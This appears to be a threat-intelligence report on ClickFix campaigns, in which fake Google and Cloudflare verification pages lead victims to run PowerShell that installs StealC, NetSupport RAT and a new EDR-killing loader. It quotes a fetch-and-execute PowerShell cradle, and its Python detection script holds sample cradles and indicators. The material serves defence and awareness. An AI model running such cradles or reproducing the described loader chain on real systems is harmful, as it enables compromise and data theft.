Fake Google and Cloudflare Verification Pages Distributing StealC, HijackLoader, and NetSupport Malware

Increased Exploitation of ClickFix Social Engineering Campaigns: A Rising Threat

Threat actors are running ClickFix social engineering campaigns that closely imitate the human-verification prompts used by Google and Cloudflare. The campaigns distribute several high-impact malware families, notably StealC, HijackLoader, and NetSupport RAT, alongside newly identified loaders, and illustrate how far attackers have refined user-assisted execution as a delivery method.

Recent threat intelligence research indicates that these campaigns have been active since late 2025. They succeed by persuading users to execute malicious PowerShell commands by hand, which sidesteps controls built around blocking downloaded files and leads to full compromise of the targeted system. That users can be talked into running these commands themselves raises lasting concerns about user awareness and the continued effectiveness of social engineering.

The attack chains predominantly rely on counterfeit “Verify you’re human” or “Manual Verification Required” pages, which mimic legitimate Google reCAPTCHA prompts, Google Meet verifications, and Cloudflare security checks. These pages are cunningly hosted on repurposed domains, compromised websites, and the Cloudflare Pages (.pages.dev) infrastructure. Victims, believing they are on a secure site, are instructed to execute commands, which can include the following example:

powershell -c "iex(irm '{IP}:{Port}/{Path}')"

The payload servers referenced by these commands listen on non-standard ports, including 6600, 9900, 5506, 7895, 7493, 149, and 8442. Some campaigns also use the IClickFix framework to inject payloads dynamically through clipboard actions, demonstrating how adaptable the technique is.

The infection process typically initiates with either obfuscated or plaintext PowerShell commands incorporated within HTML templates, such as CustomCaptcha or the aptly named “SECURITY GATEWAY” framework. This framework comprises components such as GatewayRuntime, RemoteVault, and BeaconDispatcher. In certain instances, attackers have devised an “approval gate” that permits real-time selection of payloads, thus enhancing the likelihood of user interaction.

These campaigns utilize a variety of lures, including counterfeit Google login warnings, QR code generators, and Google Meet prompts that claim to “fix audio drivers.” Endpoint responses like /api/driver-clipboard.php specifically return Operating System-targeted payloads, as has been documented by cybersecurity experts at Malwarebytes.

Once a victim executes the PowerShell downloader, it drops a script named tmpXXXX.tmp.ps1 into the Temp directory. This script, working clandestinely, creates a directory located at C:\ProgramData\Zooms, subsequently downloading second-stage payloads from Cloudflare R2 buckets or other compromised IPs. In some instances, it even exfiltrates sensitive host data to malicious endpoints.
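The following Python, added here as an illustration and not taken from the original report or from Malwarebytes, triages PowerShell process-creation command lines for the pattern described above: the iex/irm download cradle, the listed non-standard ports, the tmpXXXX.tmp.ps1 dropper name, and the C:\ProgramData\Zooms staging directory. The sample events and their IP addresses are constructed, and the length of the random token in the dropper name is an assumption.

```python
"""Triage PowerShell process-creation events for the ClickFix pattern described above."""
import re

# Constructed sample events (command lines only); these are not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "cmd": "powershell -c \"iex(irm '198.51.100.23:6600/init')\""},
    {"pid": 4188, "parent": "svchost.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"pid": 4201, "parent": "explorer.exe",
     "cmd": "pwsh -ep bypass -c \"iwr http://203.0.113.9:9900/a | iex\""},
    {"pid": 4230, "parent": "explorer.exe",
     "cmd": "powershell -c \"& $env:TEMP\\tmpA1B2.tmp.ps1\""},
    {"pid": 4255, "parent": "explorer.exe", "cmd": "cmd /c echo hello"},
]

# Ports reported for the ClickFix payload servers on this page.
CLICKFIX_PORTS = {6600, 9900, 5506, 7895, 7493, 149, 8442}

EVAL_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I)
# Bare IP:port endpoint, with or without a scheme, as in the command quoted on this page.
ENDPOINT_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})(?=[/'\"\s]|$)")
# Dropper name reported on the page; the 4-8 character token length is an assumption.
DROPPER_RE = re.compile(r"\btmp\w{4,8}\.tmp\.ps1\b", re.I)
STAGING_RE = re.compile(r"programdata\\+zooms", re.I)


def extract_endpoints(cmd):
    """Return (ip, port) pairs for every IP-literal endpoint in the command line."""
    return [(m.group(1), int(m.group(2))) for m in ENDPOINT_RE.finditer(cmd)]


def score_event(event):
    """Return the list of reasons an event looks like ClickFix; an empty list means benign."""
    cmd = event["cmd"]
    reasons = []
    if EVAL_RE.search(cmd) and FETCH_RE.search(cmd):
        reasons.append("download-and-execute cradle")
        if event["parent"].lower() == "explorer.exe":
            reasons.append("cradle launched from explorer.exe (user-pasted command)")
    for ip, port in extract_endpoints(cmd):
        if port in CLICKFIX_PORTS:
            reasons.append(f"known ClickFix port {port} on {ip}")
    if DROPPER_RE.search(cmd):
        reasons.append("tmpXXXX.tmp.ps1 dropper script")
    if STAGING_RE.search(cmd):
        reasons.append("C:\\ProgramData\\Zooms staging directory")
    return reasons


def triage(events):
    """Map pid -> reasons for every event that scored at least one reason."""
    return {e["pid"]: r for e in events if (r := score_event(e))}
```

Feeding the same functions Sysmon Event ID 1 or Windows 4688 command lines lets the explorer.exe parent check separate a pasted Run-dialog command from scheduled or service-launched PowerShell.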

The delivery mechanism is modular, using MSI installers, ZIP archives, and executable loaders as needed. Observed payload mappings include trojanized versions of legitimate applications and several stealer families, reflecting the layered nature of the distribution.

One notable infection chain involves a trojanized Franz application that downloads a previously undocumented loader known as ResiLoader. Built as an obfuscated .NET NativeAOT DLL, the loader uses a "bring your own vulnerable driver" (BYOVD) technique, loading a driver that terminates more than 140 anti-virus and endpoint detection and response (EDR) processes. ResiLoader establishes persistence through registry keys and implements User Account Control (UAC) bypasses.

The operators conceal their activity behind an extensive network of domains and infrastructure, including onegeekworld.com, antibotv3.com, and various Cloudflare R2 storage buckets. Known malicious IP addresses used for payload distribution and command and control further complicate tracking.

The campaign underscores the effectiveness of user-assisted execution: because the victim, not a dropper, launches the first stage, the attackers avoid many file-based detections. By leveraging trusted brands and compelling users to run the commands themselves, they retain a flexible, multi-layered payload distribution capability.

In conclusion, the unfolding trends in cyber threats reveal an urgent need for enhanced user education and robust security measures. Recognizing the telltale signs of social engineering and fostering a culture of skepticism about unsolicited prompts can significantly mitigate risks associated with these sophisticated methods of digital deception.

Indicators of Compromise

  • Malware: ResiLoader DLL, a new loader used for evading detection.
  • Payload Delivery IPs: 151.240.151.126, 85.239.149.16, and others associated with ClickFix infrastructure.
  • Infrastructure Domains: Various legitimate-hosting domains taken over for malicious purposes, highlighting the necessity for vigilant monitoring.

The evolving landscape of cybersecurity threats emphasizes the paramount importance of remaining attentive and aware of new tactics employed by cybercriminals. By staying informed, individuals and organizations can better defend against these pervasive threats.
